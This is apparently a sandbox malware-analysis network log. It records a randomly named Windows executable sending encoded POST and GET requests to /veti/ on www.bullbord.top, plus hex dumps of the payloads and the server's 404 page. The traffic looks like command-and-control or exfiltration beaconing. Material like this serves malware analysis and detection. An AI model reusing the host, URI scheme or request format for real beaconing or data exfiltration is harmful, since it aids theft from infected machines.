                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 50 52 59 6c 53 78 55 30 42 4a 48 56 36 64 68 2b 59 68 39 78 36 54 30 47 4c 35 34 69 73 33 6c 5a 67 47 66 41 50 31 39 55 4b 65 36 44 45 6e 35 42 2b 38 58 64 6f 67 68 67 37 44 55 78 6d 43 70 52 6a 6e 47 36 4a 52 69 2b 57 6b 31 4f 4d 73 58 4b 6b 41 7a 5a 46 7a 70 4b 76 6a 74 62 71 64 78 73 68 76 76 77 44 67 35 38 42 53 4f 4d 72 54 68 6a 4a 70 33 35 68 5a 4b 63 6b 55 39 77 67 71 6a 33 73 51 65 7a 56 6f 45 38 4c 43 35 4f 43 37 51 68 49 6d 4a 59 77 33 4d 70 35 71 54 46 36 56 66 6b 41 36 6a 41 31 6e 35 32 63 53 76 6d 2b 4c 70 47 2b 43 73 45 44 38 39 73 4d 2b 64 4b 53 2b 4a 75 55 63 6a 31 73 57 70 35 71 6c 41 64 55 45 77 4c 73 67 76 2b 51 75 31 6e 4e 58 67 62 6e 38 63 78 58 78 4e 53 4b 53 6d 75 45 4c 2b 52 33 32 70 5a 4b 56 64 33 70 32 4f 59 6d 72 68 4e 63 55 45 31 69 42 5a 39 71 41 74 2b 4a 53 78 63 32 6b 6d 4c 34 42 6c 6d 71 70 57 38 4f 39 75 66 70 73 65 6d 42 75 71 64 51 66 72 56 4e 6d 71 44 4c 37 35 2b 63 53 32 55 78 4a 56 38 4a 4d 5a 45 30 74 4d 78 37 38 38 70 33 42 4a 52 61 47 [TRUNCATED]
                                                Data Ascii: ij60MtY=PRYlSxU0BJHV6dh+Yh9x6T0GL54is3lZgGfAP19UKe6DEn5B+8Xdoghg7DUxmCpRjnG6JRi+Wk1OMsXKkAzZFzpKvjtbqdxshvvwDg58BSOMrThjJp35hZKckU9wgqj3sQezVoE8LC5OC7QhImJYw3Mp5qTF6VfkA6jA1n52cSvm+LpG+CsED89sM+dKS+JuUcj1sWp5qlAdUEwLsgv+Qu1nNXgbn8cxXxNSKSmuEL+R32pZKVd3p2OYmrhNcUE1iBZ9qAt+JSxc2kmL4BlmqpW8O9ufpsemBuqdQfrVNmqDL75+cS2UxJV8JMZE0tMx788p3BJRaG3oUEFYPP4sL5ImB0xgUs0IqTcnE+KNKXWURrzD6/Sa1NHNE+xcmg/nMbp3fIXJgxUn8fWfnMPnFw4N/qTtR5xsYec3x0MFI+3YaW5xDKwwQT8hbFRCr9pJk+vmg8FOF6BmYkhm2vCS7t8FWN9cKq1pLbhiJpKBWNwzaCOWHVx0BWUk1Owts/nUWC4QQvz3i+gP0JwiVtVyO+E=
                                                Aug 27, 2024 07:59:44.637384892 CEST1289INHTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 05:59:44 GMT
                                                Server: Apache
                                                Content-Length: 16052
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                Aug 27, 2024 07:59:44.637492895 CEST1289INData Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20
                                                Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000
                                                Aug 27, 2024 07:59:44.637506962 CEST1289INData Raw: 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b
                                                Data Ascii: style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0
                                                Aug 27, 2024 07:59:44.637622118 CEST1289INData Raw: 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c
                                                Data Ascii: 157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.34
                                                Aug 27, 2024 07:59:44.637743950 CEST1289INData Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72
                                                Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
                                                Aug 27, 2024 07:59:44.637758970 CEST1289INData Raw: 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 2e 32 39 39 36 34 2c 31 34 2e 35 34 39 38 35
                                                Data Ascii: 9885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44
                                                Aug 27, 2024 07:59:44.637769938 CEST1289INData Raw: 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                                                Data Ascii: 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.
                                                Aug 27, 2024 07:59:44.637782097 CEST1289INData Raw: 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 39 37 2c 32 2e 31 38 30 33 34 20 33 2e 37 37
                                                Data Ascii: d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,
                                                Aug 27, 2024 07:59:44.637875080 CEST1289INData Raw: 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66
                                                Data Ascii: th4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.315
                                                Aug 27, 2024 07:59:44.637975931 CEST1289INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30
                                                Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
                                                Aug 27, 2024 07:59:44.803483009 CEST1289INData Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d
                                                Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                23192.168.11.2049864203.161.46.205807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:59:47.172384024 CEST2578OUTPOST /veti/ HTTP/1.1
                                                Host: www.bullbord.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.bullbord.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.bullbord.top/veti/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 50 52 59 6c 53 78 55 30 42 4a 48 56 36 64 68 2b 59 68 39 78 36 54 30 47 4c 35 34 69 73 33 6c 5a 67 47 66 41 50 31 39 55 4b 65 79 44 46 52 74 42 2f 66 2f 64 70 67 68 67 6e 54 55 77 6d 43 70 4d 6a 6e 65 41 4a 52 75 75 57 6d 64 4f 50 2f 66 4b 6e 79 4c 5a 41 7a 70 4c 6a 44 74 5a 75 64 78 65 68 76 6a 61 44 67 74 47 42 68 53 4d 71 56 52 6a 4f 65 6a 36 74 70 4b 61 6b 55 39 73 33 36 6a 2f 73 51 61 6a 56 6f 41 38 4c 45 68 4f 54 5a 34 68 4b 31 78 59 6b 33 4d 71 7a 4b 54 4f 76 6c 66 42 41 36 6e 55 31 6e 35 4d 63 54 72 6d 2b 4d 64 47 39 42 55 48 43 63 39 73 53 4f 64 4a 57 2b 31 71 55 63 76 39 73 57 74 35 71 6b 6b 64 56 6b 77 4c 36 54 33 68 48 2b 30 73 4a 58 67 4d 74 63 41 44 58 31 6c 34 4b 51 71 75 44 2f 57 52 78 56 52 5a 5a 6b 64 33 67 32 4f 65 70 4c 68 65 53 30 45 70 69 41 31 58 71 41 4e 49 4a 56 78 63 33 46 47 4c 71 51 6c 6c 73 4a 57 36 53 4e 76 66 74 73 61 51 42 75 37 43 51 66 72 46 4e 69 61 44 4c 4c 70 2b 66 54 32 54 78 5a 56 37 50 4d 5a 72 69 64 41 4e 37 38 67 66 33 42 78 42 61 41 [TRUNCATED]
                                                Data Ascii: ij60MtY=PRYlSxU0BJHV6dh+Yh9x6T0GL54is3lZgGfAP19UKeyDFRtB/f/dpghgnTUwmCpMjneAJRuuWmdOP/fKnyLZAzpLjDtZudxehvjaDgtGBhSMqVRjOej6tpKakU9s36j/sQajVoA8LEhOTZ4hK1xYk3MqzKTOvlfBA6nU1n5McTrm+MdG9BUHCc9sSOdJW+1qUcv9sWt5qkkdVkwL6T3hH+0sJXgMtcADX1l4KQquD/WRxVRZZkd3g2OepLheS0EpiA1XqANIJVxc3FGLqQllsJW6SNvftsaQBu7CQfrFNiaDLLp+fT2TxZV7PMZridAN78gf3BxBaAXoVkFYZMgrBJIhJUw5bM0lqTQVE/f4KkSURbjDsPSd/NHJPexWwg/nMbkQfIbJgEwn9vmfifnnVA4X/qT8R59fYd9Wx08/I8bYaHpxELw3Fz8kfFRVldUTk+jug8UxFNZmeXZmyvCNu98eCd8dOqx1LYVTJqWRWOAzekHXSmJWX14S5MQnrceBYVoSG+ngjJAs0p0aCPRGQrOawGOPI+4JDOSIMV/t+aWtVVguj/NbvQwbA1hKQ402hVoXqOSomwU2Twi387zpLSTfz145E7EfnxhjX6OgVElzb/7V5S5ZfOi3UXHbjzyudrxnlv5k3mK5tEAiIBM8kerjqSz8sNUHl0oZSaU93bZIKo83o7jd4qkU/1FdNrOI9qsOkoCJB8sql12aTvcNrlwljNYm+eFxKZCRYIglqVkOIDEzmMYM1xiw88tX3cOKLUySahmRmZ4jXAq/B4u1br0YLo4SSDRfaYiO/MRTxkHBJCmEiWgUegkceDq3SX7PsqHI/TSnXfc/vQ+a/P9F5yTgVL2Iw1Ajo1FIR3KAI60Ej+qqDT+T9rIgZigIY1i5z6f3LD/S6sZwF+PEeLifmOwTMcC2n3ws1velmiVe/OdnG+tPM7lVOR+tnummgJGSMHHu4hkEYRUc7LpMJAdd3yg0eq/xq17FFsHy76ZkF+QC [TRUNCATED]
                                                Aug 27, 2024 07:59:47.172410011 CEST6445OUTData Raw: 78 34 69 4a 49 6c 59 42 32 76 58 72 77 6c 75 78 73 2f 31 39 4a 71 67 2f 6a 70 5a 39 62 68 51 59 38 6f 35 62 73 68 5a 64 4e 36 30 49 73 49 31 63 77 44 47 74 78 33 59 44 32 70 79 61 31 2f 4d 50 68 34 69 4e 41 6b 52 34 6e 31 6b 4d 6e 39 34 2f 70 4f
                                                Data Ascii: x4iJIlYB2vXrwluxs/19Jqg/jpZ9bhQY8o5bshZdN60IsI1cwDGtx3YD2pya1/MPh4iNAkR4n1kMn94/pOA6aItzID371nkImHjO9cSzcscjVUfX098336Zoa+4HRk2/DRVOHuzXKwx9kTE5diTMW3xQF5aO5kM4kT3Nuu+p7x0lJjyrhZw1zkn5AKxW/fWE/2ND7VIQWbcGLcP8WtBH1C5Ea/fJ0/izNmy3X/efqXrKhHKZbUS
                                                Aug 27, 2024 07:59:47.172470093 CEST3867OUTData Raw: 79 2f 41 32 74 6e 4a 68 35 31 37 6c 5a 78 48 45 6e 6d 7a 46 33 4e 64 4e 7a 61 74 2b 34 6c 65 41 46 78 35 2b 2b 52 6a 34 56 47 66 7a 34 39 66 30 72 6d 43 4b 44 55 58 5a 67 41 30 77 59 48 67 62 67 56 49 57 43 38 7a 4d 53 66 6b 30 33 39 5a 7a 36 6c
                                                Data Ascii: y/A2tnJh517lZxHEnmzF3NdNzat+4leAFx5++Rj4VGfz49f0rmCKDUXZgA0wYHgbgVIWC8zMSfk039Zz6l2CP6szBEd3WeF/LQZwvbVAukPr/wo3MLpSHe2MfIaBP75T7KlcW8KWFBjzf0g/HnQ+CSz2CCFwPXwe8yl2RfFpIAUoquij1/MwxNE4cUh6cg3bIsHYklYWtFuCHMQMjwoGmD6Wr95I4uYqbtndSGIpy+3MndHTYDw
                                                Aug 27, 2024 07:59:47.339867115 CEST1289OUTData Raw: 6c 41 47 54 62 64 57 66 75 58 4e 39 49 66 6f 4a 77 33 70 42 5a 76 33 70 47 5a 2f 4b 72 63 71 6b 34 4c 63 50 71 4f 4f 66 4b 41 65 4d 69 70 78 41 6a 61 51 6e 39 41 6d 38 37 59 77 4a 75 55 6b 79 72 49 64 67 49 49 74 69 72 58 7a 61 55 52 6e 32 54 6d
                                                Data Ascii: lAGTbdWfuXN9IfoJw3pBZv3pGZ/Krcqk4LcPqOOfKAeMipxAjaQn9Am87YwJuUkyrIdgIItirXzaURn2Tm+B9PipsWrEiXwMGcllYejCmaU31f+p7jiYD6/lEUnm5ZiCwmzamePnTQPzh+Y6ulXYy698/s0gUm2Duoqa5dnCgGgqms5iwRi5lqdY4jFv1zlekn9vlROodVr4lIE9jLc3s/9HYg+u9MT+Qu0q/IlF0nt5NMpi8iL
                                                Aug 27, 2024 07:59:47.339916945 CEST1289OUTData Raw: 7a 79 71 71 72 70 78 65 5a 76 66 52 4f 6b 76 2b 6a 70 4f 66 44 5a 6c 59 2b 4e 67 79 4b 71 61 65 6d 79 42 78 42 44 4f 6e 30 43 31 55 39 6f 62 2f 6f 59 41 78 6a 77 44 7a 53 73 6d 4c 5a 72 2b 34 34 33 39 6f 57 2b 31 6b 6b 34 37 64 31 5a 57 63 6f 47
                                                Data Ascii: zyqqrpxeZvfROkv+jpOfDZlY+NgyKqaemyBxBDOn0C1U9ob/oYAxjwDzSsmLZr+4439oW+1kk47d1ZWcoGX26oXvqOwB2tYyHemBNz7Wp0Mt4ycAl3esJI1yunz/Jcng/QWRJx+WvCtWUup2NVDLbyYz8lunBOXen6kTgWwd5M2J/8OXCr0B835vh0s/DXnQWz39H7ieP/r0O4FZVJqgKNKCqujL+X2YeIrNsAMtOcW/wv6/9Yi
                                                Aug 27, 2024 07:59:47.340214014 CEST2578OUTData Raw: 52 64 43 30 67 43 76 4a 6e 33 2f 39 56 54 47 43 37 73 4c 6b 46 51 69 70 71 74 36 48 66 53 2f 42 30 67 68 7a 4e 50 67 4a 4f 64 78 36 36 72 74 42 50 6f 72 6b 45 4a 36 33 79 61 56 69 48 76 6a 50 43 76 4f 55 68 4d 5a 30 64 74 30 4f 59 79 79 2b 31 7a
                                                Data Ascii: RdC0gCvJn3/9VTGC7sLkFQipqt6HfS/B0ghzNPgJOdx66rtBPorkEJ63yaViHvjPCvOUhMZ0dt0OYyy+1zIytX4DO4tLsKPZEJ2yUJL3KcheJKpYoyz8EB7qR52/MMqYE/nHX+KR8e7ZdM9d4puXSnRojB/c73cAeKews1ZLdVN5Fw10dIpboWlb5S45n04l3nmKcYpZIj81gMMsNq9d1V7pZx5UWXy/QIYQKNqdnBYosKYW4aB
                                                Aug 27, 2024 07:59:47.340370893 CEST7734OUTData Raw: 4d 34 2f 30 5a 37 2b 48 2b 72 32 59 32 51 32 77 33 65 4f 37 6a 4e 34 56 69 45 53 37 50 30 50 77 56 6d 43 42 44 65 4c 39 79 4e 52 51 68 32 58 6b 50 30 72 63 2f 4e 35 71 42 47 66 46 68 6c 4b 47 65 48 6a 4a 77 4b 4e 7a 2b 4d 48 42 41 76 64 76 77 47
                                                Data Ascii: M4/0Z7+H+r2Y2Q2w3eO7jN4ViES7P0PwVmCBDeL9yNRQh2XkP0rc/N5qBGfFhlKGeHjJwKNz+MHBAvdvwGzUj+A7jchG2t/GgrxOwbGb13fNR4QUEpSxOTYLZ4XTbiipPgG+H2fqucfAAAWkgEcTN98o1gza4F2RdMMW6eqPDY+S7BjYokXPUYYcY68b3i/2b7DdJZwICFJ9tfMFTGqtOd5dWWpPyCSkYQVecaOyBAn8/KaF4yL
                                                Aug 27, 2024 07:59:47.340621948 CEST7734OUTData Raw: 72 70 2b 5a 35 4a 52 6a 32 74 6c 35 33 36 39 76 51 4a 71 6f 63 56 71 72 69 31 68 4d 52 6c 38 6f 53 61 33 4d 6d 65 72 59 7a 37 55 4b 74 47 68 4a 74 6c 2f 75 77 6d 71 53 4a 38 77 37 72 5a 2f 41 44 55 69 72 43 48 30 31 75 4e 36 6d 4e 79 39 4d 34 70
                                                Data Ascii: rp+Z5JRj2tl5369vQJqocVqri1hMRl8oSa3MmerYz7UKtGhJtl/uwmqSJ8w7rZ/ADUirCH01uN6mNy9M4pk5KGiExSShF1pG1sZ9v5fThUoEQ7KPA+QOwxAjDSB3SsrCluGDm48PbGmqW9R7tOdVv4EpavUbPC4db0Pm93yuaXD07YAjyCf065At6kS8H2RwXsQTmOxPd2QNDbQUtAmQnhqHQmyupKdpOFGMvTbdVDzBXAtW/RD
                                                Aug 27, 2024 07:59:47.340764999 CEST1289OUTData Raw: 70 70 39 61 72 53 69 73 32 53 67 77 64 42 37 4b 6c 35 4d 62 6c 39 63 79 6d 52 51 33 78 66 2f 30 70 6d 56 61 59 59 62 55 79 77 6a 4b 2b 4d 54 4a 56 6a 5a 41 59 64 64 34 64 54 43 43 6e 32 35 45 42 6b 42 47 70 70 41 4a 53 45 6c 64 69 6b 4b 77 76 34
                                                Data Ascii: pp9arSis2SgwdB7Kl5Mbl9cymRQ3xf/0pmVaYYbUywjK+MTJVjZAYdd4dTCCn25EBkBGppAJSEldikKwv43TgqwAknMljpx7/uGmfFI0FFA4GoBS//3N+Y89e0RjMU9yZ1p3AazdbM1H6ZDBzEe9nkEPn5UHTfLZra8JrgaYF8uck1j/a00qH9yTj/OKwmdjTURr2zlQjzW1CqeWPg8fMNKWTlBQTEChVBMMt5Ch7u2m7S6EdiY
                                                Aug 27, 2024 07:59:47.340811968 CEST1289OUTData Raw: 2b 67 4d 48 2f 45 6b 74 2f 6d 2b 77 78 41 32 6b 44 4f 44 6d 57 53 44 49 34 79 6f 76 42 33 5a 4b 43 62 55 6d 75 33 4d 4d 79 79 74 58 73 30 67 76 56 57 58 2f 31 68 45 4e 65 4c 6f 62 57 38 34 6e 44 4f 6d 6f 55 6b 68 4a 35 4a 31 6a 4e 45 46 4c 50 63
                                                Data Ascii: +gMH/Ekt/m+wxA2kDODmWSDI4yovB3ZKCbUmu3MMyytXs0gvVWX/1hENeLobW84nDOmoUkhJ5J1jNEFLPcCeaJdQEsgfstYV43wv12xSm80h5mv7pxCT4CZjYu0QC6UzVwnOgPL4ZI4RLeshM2WtjMqASQGoFXJ02Cbp1aKDgE9OrO8gg4EO+j4OL0qWDyCdhDuKxeTC0ymyOySPq5soHvLWIDjceUunbmh/mv0VPWUUH9Y7yJe
                                                Aug 27, 2024 07:59:47.341774940 CEST1289OUTData Raw: 59 65 57 34 5a 49 73 6f 43 37 64 49 41 79 75 75 51 57 71 4b 6d 30 67 61 59 47 69 74 74 46 5a 55 77 74 67 55 7a 79 55 36 78 31 37 35 6b 65 4a 6d 6d 55 74 4e 4d 37 4a 62 2b 4a 4c 53 74 51 4c 44 39 6e 6d 63 67 62 51 76 51 4e 4d 77 30 54 47 62 54 72
                                                Data Ascii: YeW4ZIsoC7dIAyuuQWqKm0gaYGittFZUwtgUzyU6x175keJmmUtNM7Jb+JLStQLD9nmcgbQvQNMw0TGbTrp4OrIyGgtlbDBGm9KBKdTKCMWZ5pLkzWke2YiyOCoLrOkvZ44B6GBC0VMnAO0NyrwTHOttoNMsrB/8cHqriGi4Nd0TI304NyONQRQZO+6y76aiswJjfFMygBNnR+cNNEoTOzckTgQ/aJqQM4AcZuymCAo1LU02LT7
                                                Aug 27, 2024 07:59:47.696114063 CEST1289INHTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 05:59:47 GMT
                                                Server: Apache
                                                Content-Length: 16052
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                24192.168.11.2049865203.161.46.205807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:59:49.869117975 CEST546OUTGET /veti/?ij60MtY=CTwFRHkEL7GCscIqZBh2ghsqK7sG3QtVuFrIQG0IMtDLIws7wIuLhg5F5RICghophROLKQKALEwFGf2MtTv3MXBKvDNA89h+ifbsdhYGPDKJkkgMD8vmo5o=&wXB=brv4Erb HTTP/1.1
                                                Host: www.bullbord.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
